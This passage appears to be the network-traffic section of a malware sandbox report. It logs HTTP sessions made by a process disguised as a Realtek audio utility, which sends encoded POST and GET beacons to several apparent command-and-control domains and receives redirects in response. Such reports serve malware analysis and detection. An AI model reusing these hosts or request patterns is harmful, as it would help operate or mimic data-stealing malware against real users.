                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 70 54 62 77 79 76 6f 73 77 67 69 44 51 5a 37 56 51 71 4e 62 76 44 42 69 6a 31 5a 74 58 35 31 61 4e 6e 2b 49 54 32 54 45 76 46 65 63 4e 73 76 4c 47 72 79 35 61 43 58 44 54 68 75 32 56 53 46 34 55 55 5a 75 31 6b 53 56 65 65 43 36 66 5a 30 6e 5a 41 5a 5a 52 41 4b 74 37 2f 30 4d 61 6a 35 31 79 48 73 32 4c 34 6e 33 48 53 38 52 37 48 35 5a 58 42 53 55 36 45 55 4a 41 6e 75 59 57 54 78 79 58 77 63 42 38 72 67 70 75 54 39 49 47 38 71 6f 31 53 6d 6c 59 33 73 51 72 4d 58 54 72 34 45 6f 43 35 4f 6e 6c 62 6b 70 68 53 66 38 33 7a 45 67 51 72 39 41 42 32 73 51 6c 36 79 5a 63 6d 35 35 44 53 68 79 6e 4d 37 32 32 37 79 6d 55 75 74 59 76 61 62 76 74 68 47 36 54 42 59 42 4c 45 31 39 6f 61 44 76 72 58 63 63 44 37 44 32 47 51 4a 50 44 76 36 49 49 35 78 38 64 64 46 6c 39 56 4f 46 41 4e 33 72 64 43 69 4c 56 6e 4e 72 47 68 35 35 73 4c 43 38 75 33 6a 43 68 39 51 4c 67 55 66 4a 65 4b 78 33 6c [TRUNCATED]
                                                                          Data Ascii: lV=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBpTbwyvoswgiDQZ7VQqNbvDBij1ZtX51aNn+IT2TEvFecNsvLGry5aCXDThu2VSF4UUZu1kSVeeC6fZ0nZAZZRAKt7/0Maj51yHs2L4n3HS8R7H5ZXBSU6EUJAnuYWTxyXwcB8rgpuT9IG8qo1SmlY3sQrMXTr4EoC5OnlbkphSf83zEgQr9AB2sQl6yZcm55DShynM7227ymUutYvabvthG6TBYBLE19oaDvrXccD7D2GQJPDv6II5x8ddFl9VOFAN3rdCiLVnNrGh55sLC8u3jCh9QLgUfJeKx3lAirVxgQND0gbkRaAAniDbLJz2k7dSWE5yFZEUaOADkKuEIjwTQly/qfGuNnBAyxr04WNyp1odqbRNei/IjZA3bIiEiAr/kHcoGoEtJpqcg6UntDbo6jocQX84qspY1ZJ0p8FcIRT1vNJDVE4yIkImROWLh0Ow8jDdLv2C/L4AFTnDMvjuFGjKA2tHWwhU1caOR82yMGGsacYREDshpiXMixHChlwV1bOcao17swzRzb7K2AoMCULnl9MNGICEJje5+RXGg8i6QV110SIWi61SuI8K4BfjCwXJlsUkE3ARHZysswkg3cquqA9PBCyWdUxfhjhykrYqasrWAXAv2pSybc06Z6XLDsTI6ztFY+Mq8Gq/P3zQTBxTjHqLgr+G/tqGjJs2Kc7JrmzC2kKlxONDbzDv0jLGRXzwUGQSU4IAppAhzUrfdkk4P7w+cqPAu9ofscbQAo+YMfJ2UZeTrNMkVfN59CyZ9uKqp+0xMxVTl2wvSY0d3UfpdsCxJZGCijmJ5PNTOUFnSkZGhfXNiijFWGpedP+MCYqykrbTwfmU1p9NEOkfFHLDtt52WWK+eJVGtzuB2gtVX3hYc052dYU/mT21ctshvXmBytH/BN/5axChIYIW/8t1UhymWbJnqh8yTQyzLJtDYraNeNh8aJnWr6Fhq603Z4lBr [TRUNCATED]
                                                                          Jan 9, 2025 16:49:25.217051029 CET1519OUTData Raw: 49 69 4d 73 34 35 64 32 76 37 42 76 37 47 66 52 34 4f 33 61 36 53 44 32 70 47 72 50 43 58 74 47 32 70 63 6d 48 47 4f 33 64 36 57 73 2f 4e 6a 6b 38 32 4b 56 73 42 37 67 52 72 31 2f 65 37 30 43 37 4f 35 4d 53 2b 32 41 7a 37 65 48 49 6d 63 56 64 36
                                                                          Data Ascii: IiMs45d2v7Bv7GfR4O3a6SD2pGrPCXtG2pcmHGO3d6Ws/Njk82KVsB7gRr1/e70C7O5MS+2Az7eHImcVd6atRytEqjpXIKuFfOSMVdwjZEBUgWKozbjZa+3KFlpXcyLerv4hQ8mFl3SZFCBAyBMsNt6Z/g00aNagUOHljodm/cbwUenUw2PKisswrATMXxNaeT01qpRuJSweI1e461U/lZ2d+WIHOISR3a58rZTf9zkmsuVawu7
                                                                          Jan 9, 2025 16:49:25.349929094 CET804INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:49:25 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:49:25 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZOQPvpzEdHa6bjdhSbZ4jHvGgr0tfNGAt0rgBsEwAOAXCc%2Bt3PcF1ae8hPCz7mxdAMdkJp6zD4hODrYVsHX8TfDkPJ%2BJ93QJcpYlWh%2F7RmYXcEbC4LSSJAxXlNHPUbkaOwdl"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff593c10c37eaf5-ORD
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.11.2049773104.21.13.141807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:27.869154930 CET530OUTGET /kj1o/?lV=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:49:27.995160103 CET779INHTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:49:27 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:49:27 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lrz2%2B4VGEB6BfONc8adXj5YUqj4yDQOyNCLmS9K6myhmgVffyj8jDRTJgXA2OqYv8jQWf3OjhH9VbnCnkC04oo2tRIpEYNt1N2%2BzeEd3J4ge7wNqSaVQJPElDJC9fuioaxQz"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff593d19af5f862-ORD
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.11.2049774136.243.64.147807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:42.366858006 CET822OUTPOST /cxj4/ HTTP/1.1
                                                                          Host: www.100millionjobs.africa
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.100millionjobs.africa
                                                                          Referer: http://www.100millionjobs.africa/cxj4/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6d 48 49 50 47 61 64 4b 6c 5a 43 61 64 66 66 59 33 65 6a 5a 41 2b 67 77 48 76 76 4f 6d 49 45 75 54 35 4e 41 46 59 54 31 66 65 39 32 4c 6f 79 2f 51 58 65 70 6f 7a 51 73 72 4f 33 42 7a 77 70 73 79 62 45 31 7a 76 2f 76 71 67 55 2b 44 7a 56 38 49 37 45 76 35 45 50 4c 4c 4d 76 47 54 51 46 31 6c 61 61 43 34 44 76 50 35 45 62 4d 4c 6b 79 51 6d 43 58 4d 6b 63 52 33 2f 31 38 55 73 2f 2b 48 54 39 64 66 45 55 50 71 43 32 6f 53 72 4a 73 2b 47 31 6c 41 54 6f 51 48 68 49 55 34 59 78 32 38 76 4e 69 4a 75 35 31 78 41 63 70 30 4c 6f 4b 70 67 36 79 6d 6b 41 3d 3d
                                                                          Data Ascii: lV=tIFi+WNsJjQFmHIPGadKlZCadffY3ejZA+gwHvvOmIEuT5NAFYT1fe92Loy/QXepozQsrO3BzwpsybE1zv/vqgU+DzV8I7Ev5EPLLMvGTQF1laaC4DvP5EbMLkyQmCXMkcR3/18Us/+HT9dfEUPqC2oSrJs+G1lAToQHhIU4Yx28vNiJu51xAcp0LoKpg6ymkA==
                                                                          Jan 9, 2025 16:49:42.591762066 CET493INHTTP/1.1 302 Found
                                                                          Date: Thu, 09 Jan 2025 15:49:42 GMT
                                                                          Server: Apache
                                                                          Location: http://maximumgroup.co.za/cxj4/
                                                                          Content-Length: 290
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.11.2049775136.243.64.147807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:45.118617058 CET842OUTPOST /cxj4/ HTTP/1.1
                                                                          Host: www.100millionjobs.africa
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.100millionjobs.africa
                                                                          Referer: http://www.100millionjobs.africa/cxj4/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6b 6e 34 50 46 39 42 4b 6b 35 43 64 42 76 66 59 35 2b 6a 64 41 2b 38 77 48 75 71 4c 6c 2b 55 75 57 72 56 41 47 64 2f 31 65 65 39 32 45 49 79 36 55 58 65 79 6f 7a 63 53 72 50 4c 42 7a 78 4e 73 79 65 34 31 7a 59 54 6f 71 77 55 38 43 44 56 36 48 62 45 76 35 45 50 4c 4c 49 4f 68 54 51 74 31 6c 75 6d 43 70 52 58 51 36 45 62 44 63 55 79 51 78 53 57 4c 6b 63 52 46 2f 33 45 36 73 39 32 48 54 2b 4a 66 45 46 50 70 56 47 6f 49 6b 70 74 48 41 6c 6b 4f 63 4a 5a 77 77 34 30 6c 66 53 50 49 6e 37 76 54 7a 4c 42 56 44 50 31 47 50 59 7a 42 69 34 7a 39 35 48 79 72 66 69 50 75 7a 30 56 51 51 52 74 78 44 71 47 4e 73 41 6f 3d
                                                                          Data Ascii: lV=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+UuWrVAGd/1ee92EIy6UXeyozcSrPLBzxNsye41zYToqwU8CDV6HbEv5EPLLIOhTQt1lumCpRXQ6EbDcUyQxSWLkcRF/3E6s92HT+JfEFPpVGoIkptHAlkOcJZww40lfSPIn7vTzLBVDP1GPYzBi4z95HyrfiPuz0VQQRtxDqGNsAo=
                                                                          Jan 9, 2025 16:49:45.344302893 CET493INHTTP/1.1 302 Found
                                                                          Date: Thu, 09 Jan 2025 15:49:45 GMT
                                                                          Server: Apache
                                                                          Location: http://maximumgroup.co.za/cxj4/
                                                                          Content-Length: 290
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.11.2049776136.243.64.147807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:47.892793894 CET2578OUTPOST /cxj4/ HTTP/1.1
                                                                          Host: www.100millionjobs.africa
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.100millionjobs.africa
                                                                          Referer: http://www.100millionjobs.africa/cxj4/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6b 6e 34 50 46 39 42 4b 6b 35 43 64 42 76 66 59 35 2b 6a 64 41 2b 38 77 48 75 71 4c 6c 2b 63 75 57 2b 4a 41 47 36 4c 31 64 65 39 32 4e 6f 79 37 55 58 65 2f 6f 7a 46 56 72 50 47 6a 7a 79 6c 73 7a 34 73 31 36 4d 48 6f 68 77 55 38 48 7a 56 37 49 37 45 32 35 46 2f 50 4c 4d 69 68 54 51 74 31 6c 76 32 43 35 7a 76 51 38 45 62 4d 4c 6b 79 63 6d 43 57 76 6b 63 49 79 2f 78 59 45 74 4d 57 48 54 59 70 66 49 54 54 70 4a 57 6f 57 6a 70 74 32 41 6c 6f 46 63 4a 55 4a 77 34 41 44 66 52 66 49 6b 64 33 46 30 2f 45 4c 41 4e 46 2b 51 59 37 31 6b 37 6a 31 7a 41 7a 58 65 52 62 52 30 68 4e 54 58 6a 31 52 55 71 65 55 2f 56 46 39 72 38 4f 54 58 63 63 35 42 33 64 4d 6f 73 6c 6b 67 51 4f 75 78 4b 5a 4f 70 51 68 57 48 51 33 61 48 64 35 44 77 32 70 48 5a 42 46 53 6a 6e 7a 71 76 35 53 37 30 30 63 58 6e 66 6a 7a 4c 5a 51 53 30 49 65 55 65 68 63 70 64 67 79 56 67 51 4c 4e 73 39 5a 58 51 77 76 30 71 73 50 43 50 4b 34 47 41 55 4b 76 33 31 51 44 6a 57 4d 2f 6c 6b 36 4e 63 49 37 2f 52 65 76 [TRUNCATED]
                                                                          Data Ascii: lV=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+cuW+JAG6L1de92Noy7UXe/ozFVrPGjzylsz4s16MHohwU8HzV7I7E25F/PLMihTQt1lv2C5zvQ8EbMLkycmCWvkcIy/xYEtMWHTYpfITTpJWoWjpt2AloFcJUJw4ADfRfIkd3F0/ELANF+QY71k7j1zAzXeRbR0hNTXj1RUqeU/VF9r8OTXcc5B3dMoslkgQOuxKZOpQhWHQ3aHd5Dw2pHZBFSjnzqv5S700cXnfjzLZQS0IeUehcpdgyVgQLNs9ZXQwv0qsPCPK4GAUKv31QDjWM/lk6NcI7/RevUiBWtczGaPEvbPbSX2eQc46ABGMAWJgkgtSW7KEPXRTHm+NAKkbBCdnMKEiyRsf+wDeO7yh7HuhRJHFLkNdA4hkiD7ZX4kniJObGWp+m+cVe77KYRfifgirUfBcbDBfidJjQ5oUr0Y8ekzO0ZqEs1UqJEIbzZJaW6hK0iyijbol/JUZxpAcX8uskpsxfVfqmX76iUIj/xW0ESldgPaxSP9v4IJgnWgG7J31qI0WAqChAy+1XkKXesuMT1s57IlJnDQgJcw++hhOr73QFj341Zm/OAR77v3gAbLDuStad+5g6aaX5R80QZji5NFAUplbv/V+soJeucMH72/24G5C5CAUXujepWzYUoPB3tNBvSrvmwtWnt9w7UJr/MqZweTPcq5VJQJB6ik0cyfjzmtg1/ZxUqPXy/hBnbjvJCCRIRONIENEsU9IjO0gOLfO5gNKRSI5L/OgRuRulg6/kPx7u08P9sHI9AE34sxNo/vTdbpcyYNK9z7jeddWJkS1+EEwbR4UuuoiMqNJ1MPTp4sqh0VJN7sEStmTQIJy7R31P1cEK5wu2zNj6gL9ryl2VuhWDS7anYggDe9HEcDZcnsExrNh/D+iJus3M4J4t17McM8VCMtG+cclEZswGPLNryRbbmKUKlj3F60wfkqJTzEpEaTji1yGCGgSS2/ [TRUNCATED]
                                                                          Jan 9, 2025 16:49:47.892848015 CET5413OUTData Raw: 31 58 42 59 50 75 45 2f 66 44 6f 6e 4a 42 54 61 52 59 46 30 2b 6a 53 77 7a 48 64 6a 39 72 68 6b 4c 4c 70 31 64 44 7a 47 79 75 54 44 67 42 6f 6b 49 48 5a 50 45 43 69 77 30 74 6c 4e 6a 43 39 45 6a 61 38 67 38 66 49 79 54 39 41 4b 76 46 47 57 43 61
                                                                          Data Ascii: 1XBYPuE/fDonJBTaRYF0+jSwzHdj9rhkLLp1dDzGyuTDgBokIHZPECiw0tlNjC9Eja8g8fIyT9AKvFGWCacNWBzXqNchRYYYsiKS6m3nUSXbzkDTSXvAdb7wyqwIwnfUEbwqOUHjtu+mWEuJpvF2LumPOwEhQwvL2q8aQbGlSlHLu4EAFgIba/6jRw/PPKn6GJn0zRIQnq0IEjlRxhexKOiyodDogzplmsg6DjC7SoedaNoAPQT
                                                                          Jan 9, 2025 16:49:48.122936010 CET493INHTTP/1.1 302 Found
                                                                          Date: Thu, 09 Jan 2025 15:49:48 GMT
                                                                          Server: Apache
                                                                          Location: http://maximumgroup.co.za/cxj4/
                                                                          Content-Length: 290
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.11.2049777136.243.64.147807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:49:50.645917892 CET539OUTGET /cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.100millionjobs.africa
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:49:50.871047974 CET775INHTTP/1.1 302 Found
                                                                          Date: Thu, 09 Jan 2025 15:49:50 GMT
                                                                          Server: Apache
                                                                          Location: http://maximumgroup.co.za/cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=&LSbaT=zft4LoBw
                                                                          Content-Length: 433
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 3f 6c 56 3d 67 4b 74 43 39 6d 70 4e 48 54 6b 54 72 30 30 4f 4f 72 6c 75 6c 38 43 31 51 2b 44 58 76 4e 75 6f 4d 38 45 62 58 4d 4b 4e 6a 65 59 6d 45 5a 74 63 47 61 6a 79 42 63 74 72 57 4f 36 6f 45 48 4f 6f 6f 67 46 54 6c 66 53 38 2b 44 4e 51 77 35 35 44 32 4d 66 43 71 41 68 6a 49 6a 4e 67 5a 36 6b 77 6b 48 4c 71 49 4c 79 46 56 51 6b 6b 33 66 65 34 75 43 33 45 37 44 41 3d 26 61 6d 70 3b 4c 53 62 61 54 3d 7a 66 74 34 4c 6f 42 77 22 3e 68 65 72 65 3c 2f 61 3e 2e [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=&amp;LSbaT=zft4LoBw">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
